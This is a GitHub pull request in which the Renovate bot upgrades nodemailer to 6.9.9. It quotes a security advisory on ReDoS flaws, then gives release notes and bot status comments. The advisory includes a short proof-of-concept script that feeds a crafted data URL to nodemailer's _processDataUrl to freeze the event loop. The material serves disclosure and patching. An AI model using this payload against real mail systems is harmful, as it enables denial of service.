Skip to content

fix(deps): update dependency nodemailer to v6.9.9 [security]#584

Open
renovate[bot] wants to merge 1 commit intomainfrom
renovate/npm-nodemailer-vulnerability
Open

fix(deps): update dependency nodemailer to v6.9.9 [security]#584
renovate[bot] wants to merge 1 commit intomainfrom
renovate/npm-nodemailer-vulnerability

Conversation

@renovate
Copy link
Copy Markdown
Contributor

@renovate renovate bot commented Feb 1, 2024
edited
Loading

This PR contains the following updates:

Package Change Age Confidence
nodemailer (source) 6.9.46.9.9 age confidence

GitHub Vulnerability Alerts

GHSA-9h6g-pr28-7cqp

Summary

A ReDoS vulnerability occurs when nodemailer tries to parse img files with the parameter attachDataUrls set, causing the stuck of event loop.
Another flaw was found when nodemailer tries to parse an attachments with a embedded file, causing the stuck of event loop.

Details

Regex: /^data:((?:[^;];)(?:[^,])),(.)$/

Path: compile -> getAttachments -> _processDataUrl

Regex: /(<img\b[^>]* src\s*=[\s"']*)(data:([^;]+);[^"'>\s]+)/

Path: _convertDataImages

PoC

https://gist.github.com/francoatmega/890dd5053375333e40c6fdbcc8c58df6
https://gist.github.com/francoatmega/9aab042b0b24968d7b7039818e8b2698

async function exploit() {
   const MailComposer = require(\"nodemailer/lib/mail-composer\");
   const MailComposerObject = new MailComposer();

   // Create a malicious data URL that will cause excessive backtracking
   // This data URL is crafted to have a long sequence of characters that will cause the regex to backtrack
   const maliciousDataUrl = 'data:image/png;base64,' + 'A;B;C;D;E;F;G;H;I;J;K;L;M;N;O;P;Q;R;S;T;U;V;W;X;Y;Z;'.repeat(1000) + '==';

   // Call the vulnerable method with the crafted input
   const result = await MailComposerObject._processDataUrl({ path: maliciousDataUrl });
}

await exploit();

Impact

ReDoS causes the event loop to stuck a specially crafted evil email can cause this problem.

Severity
  • CVSS Score: 5.3 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Release Notes

nodemailer/nodemailer (nodemailer)

v6.9.9

Compare Source

Bug Fixes
  • security: Fix issues described in GHSA-9h6g-pr28-7cqp. Do not use eternal matching pattern if only a few occurences are expected (dd8f5e8)
  • tests: Use native node test runner, added code coverage support, removed grunt (#​1604) (be45c1b)

v6.9.8

Compare Source

Bug Fixes
  • punycode: do not use native punycode module (b4d0e0c)

v6.9.7

Compare Source

Bug Fixes
  • customAuth: Do not require user and pass to be set for custom authentication schemes (fixes #​1584) (41d482c)

v6.9.6

Compare Source

Bug Fixes
  • inline: Use 'inline' as the default Content Dispostion value for embedded images (db32c93)
  • tests: Removed Node v12 from test matrix as it is not compatible with the test framework anymore (7fe0a60)

v6.9.5

Compare Source

Bug Fixes
  • license: Updated license year (da4744e)

Configuration

📅 Schedule: (UTC)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate bot added the 📦 package label Feb 1, 2024
@vercel
Copy link
Copy Markdown

vercel bot commented Feb 1, 2024
edited
Loading

The latest updates on your projects. Learn more about Vercel for GitHub.

Project Deployment Actions Updated (UTC)
chirpy Ready Ready Preview, Comment Apr 1, 2026 7:16pm

Request Review

@changeset-bot
Copy link
Copy Markdown

changeset-bot bot commented Feb 1, 2024
edited
Loading

⚠️ No Changeset found

Latest commit: b59ebe4

Merging this PR will not cause a version bump for any packages. If these changes should not result in a new version, you're good to go. If these changes should result in a version bump, you need to add a changeset.

This PR includes no changesets

When changesets are added to this PR, you'll see the packages that this PR includes changesets for and the associated semver types

Click here to learn what changesets are, and how to add one.

Click here if you're a maintainer who wants to add a changeset to this PR

@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from 70a4c15 to 8c27d96 Compare March 4, 2024 06:31
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from 8c27d96 to 5360743 Compare October 15, 2024 12:37
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from 5360743 to 0512024 Compare October 20, 2024 02:39
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from 0512024 to b398c4e Compare October 24, 2024 07:51
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from b398c4e to abb643a Compare October 30, 2024 06:09
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from abb643a to 18db5b7 Compare April 1, 2025 02:00
@relativeci
Copy link
Copy Markdown

relativeci bot commented Apr 1, 2025
edited
Loading

#1455 Bundle Size — 2.56MiB (0%).

74a0fa2(current) vs 3b6dffc main#1453(baseline)

Warning

Bundle contains 4 duplicate packages – View duplicate packages

Bundle metrics  Change 1 change
                 Current
#1455		      Baseline
#1453
No change  Initial JS 1.63MiB 1.63MiB
No change  Initial CSS 89.92KiB 89.92KiB
Change  Cache Invalidation 0.34% 65.38%
No change  Chunks 60 60
No change  Assets 80 80
No change  Modules 1817 1817
No change  Duplicate Modules 254 254
No change  Duplicate Code 5.85% 5.85%
No change  Packages 151 151
No change  Duplicate Packages 3 3
Bundle size by type  no changes
                 Current
#1455		      Baseline
#1453
No change  JS 2.24MiB 2.24MiB
No change  Fonts 213.87KiB 213.87KiB
No change  CSS 89.92KiB 89.92KiB
No change  Other 15.35KiB 15.35KiB
No change  IMG 1.73KiB 1.73KiB

Bundle analysis reportBranch refs/pull/584/mergeProject dashboard

Generated by RelativeCIDocumentationReport issue

@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from 18db5b7 to 3d57e51 Compare June 15, 2025 00:31
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from 3d57e51 to 5f167c7 Compare August 10, 2025 13:55
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from 5f167c7 to 26d1e12 Compare August 19, 2025 19:34
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from 26d1e12 to c159f76 Compare October 7, 2025 18:29
@renovate renovate bot changed the title fix(deps): update dependency nodemailer to v6.9.9 [security] fix(deps): update dependency nodemailer to v7 [security] Oct 7, 2025
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from c159f76 to f4dcaf0 Compare October 16, 2025 02:05
@renovate renovate bot changed the title fix(deps): update dependency nodemailer to v7 [security] fix(deps): update dependency nodemailer to v6.9.9 [security] Oct 16, 2025
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from f4dcaf0 to 348492a Compare November 10, 2025 15:00
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from 348492a to 1b7bd66 Compare December 31, 2025 17:16
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from 1b7bd66 to 2605553 Compare January 19, 2026 14:41
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from 2605553 to 1d89879 Compare February 2, 2026 20:38
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from 1d89879 to 0da27f2 Compare February 12, 2026 11:16
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from 0da27f2 to 91d029e Compare March 5, 2026 14:03
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from 91d029e to c94007f Compare March 13, 2026 19:08
@renovate renovate bot changed the title fix(deps): update dependency nodemailer to v6.9.9 [security] fix(deps): update dependency nodemailer to v6.9.9 [security] - autoclosed Mar 27, 2026
@renovate renovate bot closed this Mar 27, 2026
@renovate renovate bot deleted the renovate/npm-nodemailer-vulnerability branch March 27, 2026 01:16
@renovate renovate bot changed the title fix(deps): update dependency nodemailer to v6.9.9 [security] - autoclosed fix(deps): update dependency nodemailer to v8 [security] Mar 27, 2026
@renovate renovate bot reopened this Mar 27, 2026
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch 2 times, most recently from c94007f to 0bfd02e Compare March 27, 2026 04:50
@renovate renovate bot changed the title fix(deps): update dependency nodemailer to v8 [security] fix(deps): update dependency nodemailer to v6.9.9 [security] Mar 30, 2026
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from 0bfd02e to 56d24f1 Compare March 30, 2026 18:16
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from 56d24f1 to b59ebe4 Compare April 1, 2026 19:15
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

📦 package

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

0 participants